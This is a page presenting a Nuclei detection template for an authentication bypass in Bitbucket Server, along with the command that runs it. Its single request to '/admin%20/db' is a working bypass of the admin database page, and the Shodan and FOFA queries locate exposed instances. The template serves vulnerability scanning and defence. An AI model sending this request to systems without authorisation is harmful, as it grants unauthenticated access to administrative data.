Bitbucket Server > 4.8 - Authentication Bypass

ID: bitbucket-auth-bypass

Severity: critical

Author: DhiyaneshDk

Tags: misconfig,atlassian,bitbucket,auth-bypass

Description

There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data

YAML Source

id: bitbucket-auth-bypass

info:
  name: Bitbucket Server > 4.8 - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
  classification:
    cpe: cpe:2.3:a:atlassian:bitbucket_data_center:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: bitbucket_data_center
    shodan-query: title:"Log in - Bitbucket"
    fofa-query: title="Log in - Bitbucket"
  tags: misconfig,atlassian,bitbucket,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin%20/db"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<h2>Database</h2>"
          - "Migrate database"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210096ea7e159ae7dc993b29b9547bd0169915b9808320f9aa83918240b667256d500220023c191efcc5bfafd550f3d971fee02a330bbce8e8e9d7b204533b3c8e14dacb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/misconfiguration/bitbucket-auth-bypass.yaml"

View on Github